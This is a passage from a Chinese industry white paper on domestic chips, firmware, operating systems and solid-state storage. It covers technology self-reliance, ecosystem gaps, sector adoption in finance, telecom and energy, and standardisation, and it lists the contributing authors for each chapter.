这在很大程度上制约了国产芯片产业的发展,同时也是影响国产芯片大规模 应用的主要因素之一。 由于部分领域存在核心技术受制于人的情况,当面临西方国家的打压时, 从芯片的研发到生产都面临着较大的挑战。通过先进EDA 软件、超宽禁带 半导体材料等四项技术的出口管制,限制包含美国上游技术的晶圆厂为国内 厂商流片生产等手段,西方国家在成品芯片、限制芯片代工、限制产能扩充 等方面对国产芯片产业的发展进行“卡脖子”,这不仅影响了芯片的研发, 同时也间接影响了国产芯片的应用。 1.2.2产业生态对国产芯片应用推广影响巨大 目前,全球的信息产业都建立在西方主导的Wintel(Windows+Intel) 体系和 AA(Arm+Android) 体系基础上。因此, “构建安全可控的信息技 术体系和产业生态”已经成为我国解决国家信息安全并提升产业竞争力的共 识。 业界普遍认为国产芯片产业生态存在以下问题:产业生态方面的不足将 导致应用迁移适配成本过高,这已经成为影响国产芯片进一步扩大应用范围 的主要因素之一。例如,底层架构不同和操作系统不同源,上层应用需要基 于不同架构或不同操作系统都做一次适配,由此导致应用的迁移成本过高(甚 至呈指数级上升),导致行业生态厂商主动在国产平台迁移的意愿不高。另外, 国外的专用设计软件不兼容国产芯片架构,也不在国产架构上做应用迁移, 导致行业专业应用在国产芯片设备上无法运行,影响正常的行业业务开展, 这也是国产芯片在特定行业领域推广面临的主要难题。 1.3 加强芯片自主可控,进 一步打开国产芯片市场空间 1.3.1持续关注核心技术研发,打造自主技术体系 中国可以基于国外指令系统做产品,但不可能基于国外指令系统构建自 主信息技术体系,因为很难动摇 Intel和 ARM对技术平台的把控,反而会造 成国内企业继续依赖现有国外信息产业生态的惰性,强化国外垄断企业已经 形成的垄断。因此,在指令集方面要持续关注自主指令集架构的生态建设, 加强与整机厂商和应用开发商的合作,推进基于自主指令系统 CPU 的产品 开发和应用适配,形成越来越多的自主技术架构产品,进而形成独立自主的 产品和技术体系。另外,芯片的IP 核(包括系列化CPUIP 核、GPU IP核、 内存控制器及PHY、高速总线控制器及PHY等上百种IP 核)决定芯片的性能、 成本、功耗、安全性,应基于自主指令系统,研发高品质的芯片核心IP, 有 基础篇-芯片 效解决核心IP 授权上的“卡脖子”问题。同时,要通过自主IP 核可持续修 改演进和对外授权,帮助下游企业开展定制化芯片设计,打破西方国家的技 术封锁。对于生产工艺方面受制于人的问题,建议两条腿走路, 一方面加大 投入力度、加强人才队伍建设,力争尽快在核心技术上取得突破;另一方面 可将短期内关注的重心放在28nm 和14nm 的材料和设备的自主化上,再向 更先进工艺迭代发展。 专项领域的国产芯片要进一步打开市场空间,也存在核心技术需要突破。 在数据存储领域芯片和存储方案推进的过程中,国产存储芯片和国产CPU 的 PCIE 链路配合缺乏先进的国产PCIE 桥接芯片,是大数据存储国产化替 代方案所面对的一个挑战。这方面需要技术上的突破,提升整体系统的数据 存储带宽。在智能网络和存储控制器领域,需要加强异构多核、非对称多处 理器技术研究与应用,加强高速智能网络控制器芯片SMART_NIC/DPU 等 研究与应用,加强传统网络虚拟化到资源池云化和软硬件协同虚拟化等技术 的研究,包括:网络和存储等功能的硬件卸载技术、DPDK\SPDK\RDMA 等 硬件加速技术、业务内容和运维功能的卸载技术等。在国产GPU 芯片领域, 首先需要突破的是核心架构和算法生态方面的技术。GPU 核心架构、算法都 是关键基础技术,投入大,研发周期长,在短时间内很难见到商业效益,所 以要依托国家自主可控发展战略,组织各方面力量群策群力、集中力量进行 攻坚克难。 1.3.2完善产业生态,掌握软件核心能力和跨指令集架构的兼容技术 国内的软件生态主要建立在国外基础软件生态底座之上,完善我国自主 的软件生态需要加大核心技术的研究,进一步掌握固件、操作系统内核、编 译器、虚拟机等基础软件能力,构建基于自主指令集架构的软件核心技术体 系,通过试点应用不断完善和发展自主软件生态体系。由于国产CPU 指令 集架构不同,增加了软硬件产品的适配成本和适配难度。因此,要探索建立 统一应用编程框架,统一规范API 接口,做好编程框架的演进规范,为应用 提供标准的开发适配环境,完善和规范产业生态,更好地实现跨指令集架构 兼容。同时,要在操作系统下层加强指令集之间的深度融合,实现跨平台的 应用兼容,打破应用生态壁垒,实现跨指令系统兼容(例如通过二进制翻译 实现 Linux 系统上直接运行X86 平台软件)。此外,要尽快推进标准化工作, 为行业应用和企业发展指定明确的目标和清晰的方向。通过社区版操作系统, 降低产业链门槛,为下游客户提供操作系统定制化能力,联合产业链合作伙 伴根据用户需要联合开发下游产品和解决方案,从而推进产业应用生态的不 断完善。 1.3.3加强产品化工作,提升用户对国产芯片的信心 目前,基于国产芯片的整机产品在稳定性、性价比、生态建设等方面, 与国际主流产品还有一定的差距。国产芯片需要通过提升产品的稳定性、性 价比、完善产业生态来提升用户对国产化的认可。国产芯片企业要加大研发 投入,提升国产芯片的产品质量、性价比、安全性和稳定性,打造典型解决 方案、研制评价标准体系、建设信息技术融合应用生态,并协同产业链上下 游加强产品技术攻关,不断提升产品性能和竞争力,提升用户体验和对国产 芯片的认可度。 本章主笔人员: 龙芯中科技术股份有限公司靳国杰、柳军 本章贡献人员(按公司名称拼音排序): 北京网迅科技有限公司胡金山、钱利国、姜堃 基础篇-芯片 北京忆芯科技有限公司曾莎莎、林岗、姚宇 三未信安科技股份有限公司杨国强 上海算石科技有限公司黄坚会 太极计算机股份有限公司张洪明、杨家豪 无锡沐创集成电路设计有限公司王孟元 芯盛智能科技有限公司董昱 郑州信大捷安信息技术股份有限公司刘为华、韩金池 中电科申泰信息科技有限公司桂江华 中航鸿电(北京)信息科技有限公司严华锦 2.固件 在计算机体系中, 固 件 就 是 写 入 芯 片 ( 如 EPROM、EEPROM 或 Flash) 中的程序。固件将软件固化存储在芯片中,是设备内部保存的驱动程 序,是设备最底层工作的软件。它往往处于系统呈上启下的关键位置。在国 家信息安全战略全面推进的背景下,国产化计算机的广泛应用已是必然趋势, 国产固件技术和相关产品快速发展,市场占有率日益扩大。 2 . 1国产固件全面支持国产基础软硬件平台 计算机产业链主要由上中下游三大环节构成。其中,上游主要包括构成 计算机系统所需的硬件器件、部件,固件和操作系统厂商;中游包括计算设 备整机设计、集成、制造厂商;下游是基于整机的信息系统集成应用环节, 包括各领域信息系统集成商、运营商等。 固件与 CPU、 操作系统、内存、硬盘等,在计算设备产业链中整体上处 于上游位置,是计算机系统重要组成部件,共同构成计算设备整机。固件基 于处理器授权和技术支持,适配相关操作系统、外设板卡,实现操作系统引 导启动、硬件初始化和驱动加载等功能,支撑计算设备运行。 2.1.1 国产固件在关键技术上取得突破 国产BIOS 目前符合UEFI 规范、PI 规范,符合固件领域和安全可信领 域各项国标、军标和行业标准,具有专用、军用、嵌入式等多应用场景版本, 适用于包括服务器、终端、移动设备和嵌入式设备等各种机型,满足了国产 计算机基础需求。国产BMC 固件已全面支持主流行业标准协议,可与现有 服务器管理应用系统无缝衔接集成,提供服务器精细的设备监控、精准的故 障定位和丰富的远程接口,具有完善的安全防护机制。在此基础上,基于国 产嵌入式处理器芯片的100%国产化的软硬一体服务器带外管理解决方案也 已达到成熟的水平。随着处理器芯片、基础软件和应用软件方面的技术积累 日趋成熟,自主可控的国产化计算机正在开始规模化生产和应用。在这个过程中, 根据不同行业、不同用户的特色需求,对计算机硬件和软件进行深度定制是未 来发展的必然趋势。近年来,国产固件在关键技术上取得了一系列突破。 一是国产固件已经能支持多处理器架构的计算机引导和启动技术。相对 于国外商用固件厂商,国产固件厂商面临更复杂的处理器和操作系统组合关 系。国内已有龙芯、飞腾、申威、鲲鹏、海光、兆芯等多种处理器品牌,分 别使用了LoongArch 、ARM 、SW64 、X86 等多种处理器架构。同时,国产 处理器还将适配麒麟、统信、普华、中科方德等多种操作系统。为了支持多 处理器架构,在 BIOS 方面国产固件采用了层次化和模块化计算机引导和启 动技术,通过硬件平台特性抽取、操作系统统一接口等方法,实现了同一套 固件基础代码支持多处理器架构的硬件平台初始化和配套操作系统引导,有 效减少了不同平台重复开发和适配工作量。在BMC 方面,国产固件采用了 基于国产处理器芯片的BMC 系统重构技术,可提供龙芯、飞腾等多种全国 产处理器的BMC 软硬件解决方案,可实现非国产BMC 系统的全能力原位 替代。 二是国产固件可以支持多处理器平台商用板卡。由于商用板卡没有国产 平台固件驱动,因此仅支持X86 处理器平台,这导致国产处理器平台难以直 接使用 RAID 卡、光纤卡、显卡等商用板卡,极大地制约了国产计算机的推 广应用。经过国内固件厂商的努力,目前已经突破了多处理器平台商用板卡 固件支持技术,能够在国产处理器平台上直接使用商用板卡的X86 平台驱动, 填补了国内空白。 此外,国产固件在可信计算的支持方面持续发力,取得了全面的进展。 可信固件技术通过统一的架构,支持TPM、TCM、TPCM 等多种可信硬件芯片, 支持国密、特种行业密码要求,能够对用户的身份、关键硬件、核心软件进 行安全验证,保证计算机的安全启动运行环境;在服务器领域,可通过可信 BIOS和可信BMC 构建双信任链,实现对服务器BMC 系统的完整性度量, 防止 BMC 系统被恶意篡改和替换,提升服务器系统底层安全防护能力;在 外设方面,支持外设扩展的可信计算方案,全面覆盖了国内各行业对可信计 算的固件功能要求。 2.1.2国产固件的应用范围不断扩大 应用系统的全平台支持需要适配多种处理器和操作系统的组合,导致了 异构处理器设备统一运维管理难度加大、信息系统安全合规要求提升、应急 处置机制及服务响应要求提高、行业软件适配工作量加大等技术难题,也就 是所谓的产业“生态碎片化”的问题。依靠固件技术可以较好的解决这些新 问题,这为固件产业的进一步发展带来了新的机遇和市场空间。 目前,国产固件已支持龙芯、飞腾、申威、兆芯、海光、鲲鹏等主流处 理器,以及麒麟、统信、普华等国产操作系统。在整机方面,国产固件已应 用于浪潮、联想、同方、华为、长城、新华三、宝德等主流计算机整机产品中。 在行业应用方面,国产固件已在电子政务、金融、教育、电信、电力等重点 行业领域取得大规模部署和使用。此外,国内固件厂商研发了基于固件层的 安全支撑软件,对国产操作系统和应用软件形成了新的安全支撑。 随着国产计算设备在各个重点行业的大规模部署应用,业务系统中的处 理器和操作系统组合多样性导致了异构处理器设备统一运维管理难度加大、 信息系统安全合规要求提升等问题。由于国产固件天然具有跨平台、牢固持 久、不可绕过的特性,基于国产固件的相关产品可以较好的解决这些新问题, 这为固件应用的发展带来了新的广阔空间。目前国产固件已应用于党政领域, 金融、电信等重点行业领域以及特殊行业和嵌入式领域。 在国家政策的驱动下,市场需求持续释放,国内基础软硬件的景气度持 续上行,固件市场仍有巨大空间。未来,随着国产计算机的快速发展,PC、 服务器、嵌入式设备对国产固件的需求量均将持续增加。此外,对信息安全、 供应链安全要求相对较高的领域,也是国产固件的优势市场。 2.2 固件产业进一步发展面临的困难 现阶段产业发展重点主要是完善基础软件产品生态,通过多种措施促进 产业链上下游企业间的协作,支持基础软硬件厂商开展系统集成适配关键技 术攻关,面向应用需求,体系化地提升关键基础软硬件的性能和可靠性。现 阶段,固件产业发展面临两个方面的困难: 一方面国外企业长期垄断产业链 各环节,在技术、产品和市场上长期领先,国内企业突围难度大;另一方面 尚未形成良性发展的产业生态。固件产业发展面临的具体问题包括: (1)国内厂商不掌握国际标准规范的话语权 近年来,国产固件在技术和产品上取得长足进步,并实现了规模化应用。 但是相比国外厂商,国内厂商在国际固件开源社区中仍处于跟随状态,贡献 度较小。因而在国际标准规范方面的话语权较小。 (2)固件专业从业人员基数较小 相比国外厂商,国内专业从事固件技术和产品开发的人数较少。美国仅 AMI 公司员工人数就超过2000人,而国内主要独立固件供应商的人员规模 仅在三四百人左右。从业人数少、培养周期长,这是制约中国固件产业快速 发展的主要因素之一。 (3)国内固件市场规模较小 固件市场规模与计算设备出货量直接相关。目前,自主创新的计算设备 整体出货量相比非自主设备,占比不超过5%。较少的市场份额,制约了固 件厂商的投资规模,进而影响了固件技术产业的发展。 (4)缺乏统一的标准规范 目前,国内处理器平台分支多样化,并在快速演进和创新。相应的,固 件产品需要适配各种技术路线。由于固件产业未能针对国产平台的特点和需 求形成体系化的标准规范,导致固件厂商在面对主板、外设板卡和整机厂商 时适配效率较低。 2.3 国产固件要在两个方向加大投入 2.3.1加强研发投入,不断在新技术上取得突破 随着国产计算机研发速度的加快,传统的BIOS 开发、测试手段已不足 以满足快速发展的需求。因此,在开发方面需要加强国产BIOS 的模块化、 组件化设计能力,提升细粒度的软件定义能力,适配最新的龙芯、飞腾、申威、 鲲鹏、兆芯、海光等国产处理器新型平台和其配套芯片组。在国产BMC 方面, 需要加速研究基于国产龙芯、飞腾等国产嵌入式处理器平台的100%国产化 的服务器带外管理方案,提供适配范围更全面的全国产BMC 系统整体解决 方案,并在更多的行业领域中进行定制及应用。面对“生态碎片化”的问题, 固件厂商应在固件级应用扩展方面持续投入,针对各类型各型处理器平台, 研发适配能力强的设备管控与安全管理系统,对下管控计算设备,对上为业 务系统可靠性与安全性赋能,构建并维护合规的计算环境。 2.3.2完善标准化工作,为可持续发展奠定基础 目前,国产计算机产业发展的难点之一,在于标准不统一导致的兼容性 复杂和适配成本过高。在固件领域,缺乏BIOS 、BMC 方面的国家标准。国 内已经发布了《信息安全技术可信计算规范可信平台主板功能接口》 (GB/ T29827-2013)、《 信息安全技术可信计算规范服务器可信支撑平台》(GB/ T36639-2018)、 《 信息安全技术可信计算可信计算体系结构》 (GB/T 38638-2020)、《信息安全技术可信计算密码支撑平台功能与接口规范》(GB/ T 29829-2013) 等相关国标,对固件进行一定的安全性要求,但是并未出台 针对固件的专门标准,使得固件与硬件厂商、整机厂商、操作系统厂商之间 的接口规范不能统一,在一定程度上影响了国产固件和上下游产品的适配效 率。未来固件厂商在标准化方面需要做的工作还比较多。 本章主笔人员: 昆仑太科(北京)技术股份有限公司陈小春、孙亮 3.操作系统 3.1 国产操作系统进入发展关键期 3.1.1 行业需求逐步明确 近年来,我国的外部环境不确定性加剧,国产化替代的紧迫性提升,网 信产业正处于发力期。伴随产业政策坚定支撑与外部环境不确定性的双重促 进,以及核心品类不断打磨成熟,网信产业将逐步向品类拓宽和行业拓展两 方面继续发展。 在金融行业,2022年1月下旬,银保监会发布《关于银行业保险业数 字化转型的指导意见》,为银行保险机构的科技能力建设提出了具体要求,即: 坚持关键技术自主可控原则,不断提高自主研发能力,加强技术供应链安全 管理。 在通信行业,2021年11月工业和信息化部发布《“十四五”信息通信 行业发展规划》。规划首次将创新发展网络安全产业作为重要任务之一,通 过开展创新示范应用、繁荣网络安全产业生态培育工程等措施,进一步提升 网络安全产业核心技术掌控水平,为网络安全保障提供扎实支撑,为数字经 济健康发展保驾护航。 在能源行业,为加快开展能源行业网信自主创新工作,国家和地方均出 台了相关政策,多地政府在十四五相关规划中提到“智慧能源”,并提出相 应的发展措施和未来规划。 3.1.2 国产操作系统产业稳步发展 操作系统作为计算机系统中最基本的基础软件,控制并管理着整个计算 机系统的软硬件资源,并组织及调度计算机的资源分配,供软件应用调用。 所有重点行业领域的网信工作均需要具有足够性能、稳定性和安全性的国产 操作系统作为信息系统的底层基座。目前,国产操作系统绝大多数选择以 Linux 为技术基础进行二次创新和开发。2020年国家“十四五”规划中将开 源技术列入国民经济和社会发展五年规划纲要,为国产操作系统在行业的广 泛应用打下政策基础。以前我国各行业使用的开源操作系统主要是 CentOS 为代表的国际社区服务器版本。但CentOSLinux8已于2021年底停止维护, 使用范围更广的CentOSLinux7 也将于 2024 年 6 月 3 0 日停止维护。这势必 会造成漏洞难以控制、稳定性变差等安全隐患。在此背景下,操作系统国产 化势在必行。 目前,国产操作系统厂商已经通过自建或参与建设开源根社区,在开源 社区版本和商业版本等多个领域取得进展,已先后进入多个关键领域并取得 重要应用。根据赛迪顾问统计,在我国操作系统市场,国产操作系统占有率 逐年提升,已经开始实现对微软和IBM 等传统操作系统传统厂商的近身追 赶之势。在移动终端和嵌入式操作系统领域,随着手机平板等智能终端、新 能源汽车、电力装备、工业控制等领域对国产操作系统的替代需求逐步增强, 国内移动终端和嵌入式操作系统厂商相继推出了基于国产处理器、面向多场 景应用需求的定制化移动终端和嵌入式操作系统产品和解决方案。 3.1.3 行业对国产操作系统的需求包括四个方面 重点行业网信自主创新工作加速推进,将促使国产操作系统与各类基础 软件、应用软件、信息安全、云服务等产品和解决方案实现融合赋能,实现 各行业全流程无缝嵌入,全面提升各行业主体运营效率、降低运作成本、提 高发展质量。可以预见,未来对国产操作系统的主要需求包括四个方面: (1)操作系统领域核心技术的自主,主要集中在服务器和桌面根社区 领域的自主。 (2)国产操作系统应具备高安全性、高稳定性和持久服务的能力。 (3)应用的复杂性和多样性要求国产操作系统能够同时支持X86 和目 前主流的国产 CPU 架构。 (4)通用领域要求国产操作系统具备丰富的生态支持。这也是目前重 要的竞争方向。 3 . 2不同行业对国产操作系统的需求各异 随着党政领域替代的实施和国产软硬件产品及生态逐步成熟,金融、电 信、石油、电力、交通、航空航天、教育、医疗等关键行业,是国产操作系 统未来的主战场。国产操作系统在关键行业领域一般业务系统已开展规模化 应用,核心业务系统逐步开展推进试点和示范。操作系统及产业链上下游厂 商需要从产品、方案、生态等方面加强针对性设计,以适应行业的策略规划 和业务场景需求。目前,行业应用对国产操作系统及上下游厂商的挑战,主 要包括:原有业务应用系统迁移移植、历史软硬件生态支持、行业特色软件 兼容适配、国外大型软件产品(含工业软件)替代等。 3.2.1 金融领域需求分析 操作系统是金融行业各类服务端/终端设备和业务系统高效稳定运行的 基座。金融领域对操作系统的安全性、稳定可靠、连续性、性能要求更高。 随着数字金融的不断推进和CentOS 系统停服带来的网络安全问题,对操作 系统国产化替代提出了更高的要求,需求也更加迫切。 金融行业的业务应用场景主要有办公系统、金融机具、 一般业务系统和 核心业务系统四大类,其中办公系统逐步由传统办公趋向于智能化办公发展, 包含基础办公、业务协同、团队协作及应用集成四个方面,支撑内部复杂的 日常办公事务;金融机具新型终端设备实现把原有高柜人工办理的业务迁移 到柜外自助设备办理,解放人工投入。随着互联网、云、大数据、微服务等 技术的不断发展,“云+分布式+信息化创新”的一般业务系统部署架构逐 步形成,这要求操作系统提供高性能、高可用、高扩展、高安全的核心服务。 目前国产操作系统已在国内相关银行业务系统开展广泛应用。国产桌面 操作系统通过标准产品或定制方式能满足办公和业务系统应用需要,兼容主 流软硬件和外设生态。国产服务器操作系统可支撑金融行业构建大型数据中 心服务器高可用集群、负载均衡集群、分布式集群文件系统、虚拟化应用和 容器云平台。 3.2.2 电信领域需求分析 电信运营商已和国产操作系统厂商建立了一套国产化替代机制,满足运 营商自身内部办公、专用设备、通信用户服务系统的国产化替代和创新,为 外向型拓展业务空间和抓住全面替代做好了布局。 目前,国内三大运营商结合现有国产化实施经验,协同部分软硬件、控 件厂商开展了营业厅、办公场景下的操作系统适配和替换,适配及应用范围 包含但不限于CRM 、 无纸化系统、外接设备及办公类软件等主要应用,国 产化营业厅已支持业务流程正常受理。未来3-5年,至少有100万套国产桌 面操作系统作为主要系统平台,搭载国产应用软件在国内三大运营商的营业 厅使用,为国内用户提供优质服务。某运营商用户对国产操作系统的评价是 简单易用、稳定高效、安全可靠的新一代图形化桌面操作系统。 3.2.3 能源领域需求分析 能源行业国产化主要聚焦于办公管理系统、生产经营系统、生产控制系 统和为生产管理提供设计或辅助的系统,对国产操作系统需求是安全、实时、 全流程可靠。目前,针对办公系统的操作系统已经开始从“可用”向“好用” 发展;针对生产经营系统,虽然已有部分企业研发了相应软件,但在复杂、 大型生产场景下还需依赖国外产品;生产控制系统是能源未来开展有关工作 的重点,目前中低端产品实现部分可控,但其中核心部件仍大量采用国外产 品,高端产品仍为国外垄断;为生产管理提供设计或辅助的系统需要长期不 断的投入。 国产操作系统在能源行业的推广,从小范围的传统能源领域试点到现在 推广到新能源领域,已广泛应用于能源的各个领域。电力行业自主创新布局 比较早,已经步入规模化应用阶段。在国家电网D5000、 南方电网OS2 调度 系统工程中,基于国产操作系统、数据库和中间件为基础软件底座实现了全 国产化,并逐步实现了软硬件一体全国产化。 3.3 加强开源协作,缩短操作系统生态差距 国产操作系统生态建设目标是丰富原生适配软硬件生态、解决兼容 “Wintel” 平台软硬件的历史生态包袱问题,主要通过应用拉动、技术创新、 开源建设、统一标准规范等多个方面循序渐进完成。其中,开源操作系统和 自主根社区是国产操作系统生态建设的重要推动力。目前,国产操作系统正 在从单一版本生态逐步向构建以中国原生操作系统根社区为基础的统一生态 迈进,中国操作系统根社区在国际操作系统产业的主导力将逐步提升。 3.3.1 国内操作系统根社区蓬勃发展 基础软件领域的技术开源,能降低行业技术开发成本,有效助力产业发 展。历史上国产操作系统基于国外开源社区进行二次开发,发布商业发行版 本,可持续发展依赖于国外社区,缺少主导权。这导致基础软件技术创新性 不高,且难以实现共享,严重影响了我国数字经济的发展和开源生态的繁荣。 开源作为科技创新的重要模式,已经列入我国重大发展战略。2021年11月 工信部印发《“十四五”软件和信息技术服务业发展规划》(以下简称“规划”), 规划将开源重塑软件发展新生态作为“十四五”期间我国软件产业的四大发 展形势之一,培育重点开源项目、建设优秀开源社区、提升开源治理能力是 开源生态的三个重要方向。在此形势下,国内涌现出了一批操作系统开源社 区,如 openEuler 、OpenAnolis 、OpenCloudOS 和 openKylin 、Deepin 等。这 些根社区基于不同的行业需求和应用场景,分别致力于打造中国服务器操作 系统和桌面操作系统根社区。 3.3.2开源带动了国产操作系统生态发展 (1)基于自主操作系统根社区构建创新生态是可持续健康发展之路 近几年,国内各操作系统厂商普遍重视基于自身版本的上下游软硬件适 配的生态建设,形成了各自产品生态。但是操作系统并非单一产品版本,而 是生态系统。为促进国产操作系统技术收敛,业内开启了大力构建国内原生 根社区的工作, 目标是有效解决上游技术社区分散导致的发行版生态发散、 上下游软硬件重复性适配的问题。操作系统根社区本身就是一项根技术,同 时也是沉淀各种根技术的最佳平台。基于自主根社区持续沉淀创新成果,汇 聚各方力量共建根深叶茂的统一生态,支持千行百业的需求,这是实现国产 操作系统持续健康发展之路。 (2)通过开源操作系统根社区统一自主CPU 多样化生态 国内自主CPU 目前尚没形成龙头产品,缺乏在市场上处于领先地位的 CPU (类似美国的Intel)。 因此,我国自主CPU 尚不能有效驱动整机、软 件等资源自动汇聚。当前,基于操作系统根社区构建我国自主计算生态,向 下屏蔽不同 CPU 架构,向上形成统一融合应用开发环境,是最佳选择。自 主开源操作系统根社区将推动国产操作系统生态建设,从基于“版本生态” 升级成基于社区“公共生态”+“行业生态”的崭新局面。 (3)开源操作系统生态建设,是商业发行版操作系统生态储备和生态 前置 自主开源社区操作系统版本, 一般都是国内各商业发行版操作系统的技 术预览版。基于统一的自主开源社区操作系统版本有助于实现生态共建,促 进我国商业发行操作系统的生态建设步伐,实现商业发行版操作系统生态储 备和生态前置。 本章主笔人员: 麒麟软件有限公司董军平、杨汇成、朱天旭 湖南麒麟信安科技股份有限公司石勇、陈松政、沈岗 本章贡献人员(按公司名称拼音排序): 北京东土科技股份有限公司周爱平、陈晟民 北京凯思昊鹏软件工程技术有限公司陈鹏、李云翔、闫苗 龙芯中科技术股份有限公司王洪虎 太极计算机股份有限公司张洪明、高楠 统信软件技术有限公司张木梁、邓静、王周飞 长扬科技(北京)股份有限公司徐宁、章轶 4.存储 当前,数据已成为重要的生产要素。对于看不见、摸不着的数据来说, 存储设备是其存在和发挥作用的基础,硬盘作为最重要的存储设备仍存储着 全球大部分数据。其中固态硬盘作为核心存储设备,需要重点关注。本章重 点围绕固态硬盘探讨自主创新的存储技术、产品,以及其应用情况。 4.1 自主创新的存储技术和产业取得快速发展 目前,国内存储市场仍由国外品牌主导。固态硬盘绝大多数的市场被三 星、西部数据、金士顿、东芝、英特尔等国外厂商占领。但是自主创新的国 产品牌在关键技术上已经取得了一定的突破,产品趋于成熟,但要走的路还 很长。 从技术视角看,固态硬盘主要涉及主控芯片、固件、存储颗粒三项核心 技术。国内对这三项技术掌握程度较高,仅在少数技术上略落后于国际一流 水平。我国在主控芯片技术、纠错技术方面处于跟随状态,低功耗技术略为 落后,其他技术与国外持平;在固件技术方面,几乎与国外持平;在存储颗 粒方面,闪存芯片技术堆叠层数已经和国外持平。 从产业视角看,国内主流厂商具备了开发并实现规模量产主控芯片和固 件的能力。国产固态硬盘在可靠性、稳定性、性能等方面的成熟度基本达到 国际水平,接口形态与国外一致,具备了替代条件。 从市场占有率的角度看,虽然国产主控芯片的出货量与国外厂商还有较 大差距,但近几年成长迅速,全球市场占有率从2019年的6%(1500万颗) 发展到了2022年的10%(3500万颗)左右 |。 从行业的角度看,政府、电信、金融、电力等关系到国计民生的重点行 《信息技术应用创新固态硬盘技术与产业白皮书》 业逐步开始认识到存储设备自主可控的重要性,在某些细分领域开始规模使 用国产固态硬盘,已经占整个国产固态硬盘出货量绝大部分份额。国密算法 和国产固态硬盘结合形成的国密加密固态硬盘,在党政安全市场出货量已经 达到百万级,安全可信国产固态硬盘在电力行业、网络安全行业也开始应用。 4.2 国内存储产业面临的主要问题 国内存储厂商起步较晚、技术积累不够厚实、用户认可度尚在逐步提高中、 市场占有率还不高,同时还面临西方国家在核心技术和供应链两个方面对我们 频频“卡脖子”的压力。国内存储产业要进一步快速发展,需要解决好以下三 个方面的问题: 一是尽快规范市场行为,给真正致力于自主创新的企业创造生 存发展空间;二是本身要不断提升产品成熟度和性价比,树立用户对民族品牌 的信心;三是供需双方积极扩大自主产品在重点行业领域的市场占有率。 4.2.1 市场缺乏规范指引 随着国产化替代工作的有序推进和网信自主创新产业的快速发展,国内 的存储市场引起了国内外资本和相关企业高度关注,各种国产存储产品如雨 后春笋般涌现。但是,由于国产存储缺乏统一的标准,特别是缺乏“自主可控” 的判定标准,导致了各种以国外产品“穿马甲”冒充自主可控产品的现象。 目前,国内做固态硬盘主控的厂商有三、四十家,国产固态硬盘厂商更 多,但真正能做到全国产化的并不多。目前“穿马甲”的手段主要有以下几种: 一是中国品牌、国外技术,直接采用国外的芯片、固件、颗粒等全套技术和 产品,包装成国产产品;二是购买国外主控芯片和颗粒芯片,封装成自有品 牌的国产固态硬盘产品;三是国内注册公司,但核心资本、技术、管理都在 国外。上述缺乏核心技术积淀、仅靠商业运作的“穿马甲”行为,短期看繁 荣了国产存储市场,长期看阻碍了存储行业的核心技术自主创新,以及民族 产业的可持续发展。 4.2.2产品成熟度和性价比有待提升 国内早期固态硬盘厂商使用国外主控芯片和国外颗粒进行组装,并不掌 握核心技术,这使得国产固态硬盘没有得到国内市场的认可。尽管国外大厂 依然引领着技术发展路线,英特尔、西部数据、美光等美国大厂主导了接口 协议和固态盘机械结构,在半导体制程技术、新型非易失存储介质等方面也 处于领先地位,但是经过10年的发展,国内真正关注核心技术自主创新的 存储厂商已经逐渐掌握了相关核心技术,部分指标已经超过了国外产品。如, 我们在芯片设计上和国外并没有太大差距;从实际使用上看,国产固态硬盘 已经达到了可用的程度,具备在部分场景下支撑国产化替代的条件。不过, 在成熟度和易用性上与国外产品还有一定的差距。 从出货量上比较,国外大厂固态硬盘每年出货量超过几千万片,可以分 摊高额的研发投入,而国内厂商(尤其是主控厂商)出货量无法与国外厂商 相比。因此,尽管我们在净研发投入上低于国外厂商,但从分摊的角度看, 每块硬盘的研发成本远远高于国外,这不利于产品的快速更新迭代。因此, 尽快提升产品的性价比,提高市场的认可度,进而提高出货量,达到降低平 均研发成本的目标,这是国内存储厂商需要解决的另一问题。 4.3 国产存储构筑底层信息安全实现路径 4.3.1 加强标准化,规范市场行为 规范存储领域市场行为,不仅是引导国内厂商发展和掌握核心技术,同 时也需要防患于未然,引领未来存储技术发展,提高标准化方面的话语权。 一方面要制定有利于国产存储技术发展标准,从公司资质、芯片关键IP、 关 键元器件、研发过程等维度加强自主可控程度的管控。以利于促进国产存储 厂商掌握核心技术,避免走捷径的短视行为对整个行业的破坏。二是制定国 内主导的硬盘标准作为现有国外主导标准的补充,包括但不限于接口协议、 硬件形态、安全可信技术、智能存储等。以促进和引领未来存储软硬件的联 合创新应用发展。 4.3.2通过关键技术研发提高产品成熟度 固态硬盘的核心技术包括主控、固件、颗粒、成品模组和软件等,其中 以主控、固件和颗粒开发技术最为复杂。 主控芯片业界最常见的是全球 IP 龙头 ARM 和 EDA 龙头 Synopsys ARC 架构。这两家公司分别属于英美,单纯依赖他们的技术和产品一方面存在“卡 脖子”风险,另一方面还要承担高昂的许可费用。近几年开源RISC-V 架构 兴起,成为了主控芯片架构的新选择。类比开源Linux 操作系统成为国产操 作系统的主要技术路线, RISC-V 架构有望成为国产芯片的主流技术路线, 不仅可实现技术自立,也可降低芯片成本。 固件管理盘片数据的存储,决定硬盘的功能和性能。自研固件搭配国密 算法,可以实现数据加密存储,同时可以强化固件安全控制,避免风险固件 植入。另外,基于固件技术搭配工具软件,可以实现对固态硬盘进行全生命 周期管理和数据恢复,在保证数据安全、提高盘片的可靠性方面大幅提高性 能,增强用户使用信心。 主控技术国产化和国产颗粒,可以引领全产业链的自主可控。随着国产 存储应用规模逐渐扩大,关键核心技术不断突破,固态硬盘产品整体的成熟 度也不断提升,有望短期内达到国际一流水平。 4.3.3 加快技术迭代和规模应用,占领重点行业市场 自主研发的固态硬盘目前已经基本上掌握了核心技术,具备解决重点行 业痛点、助力产业升级的技术条件。后续需要加快技术迭代,逐步实现国产 存储在重点行业认可度的提升。同时,要加快国产存储在重点行业的规模应 用,通过示范项目探索行业特性,打造行业特色鲜明的国产存储解决方案, 进而进行标准化推广,形成规模部署。这将有利于提升重点行业对国产固态 硬盘的信心,进而有利于提高产品的成熟度和降低成本。技术和市场相互促 进,进入良性循环,自主研发的国产固态硬盘势必在重点行业市场中得到广 泛应用。 4.3.4加强产业生态合作,实现国产存储高质量发展 加强生态合作,是后摩尔时代重要的创新源泉。当前,芯片的算力发 展已经大幅放缓。而传统的冯诺依曼架构中,数据存储和数据运算是两个相 互独立的单元,频繁地通过数据总线进行数据交换带来效率的损耗。因此, 基于生态厂商底层的优化将有助于各个部件发挥出更大的潜力。例如,将固 态硬盘作为CPU 的协处理器, 一些运算直接在盘内完成,不但可以减少数 据传输,还有助于减轻 CPU 的负担,提升整体运行效率。此外,固态硬盘 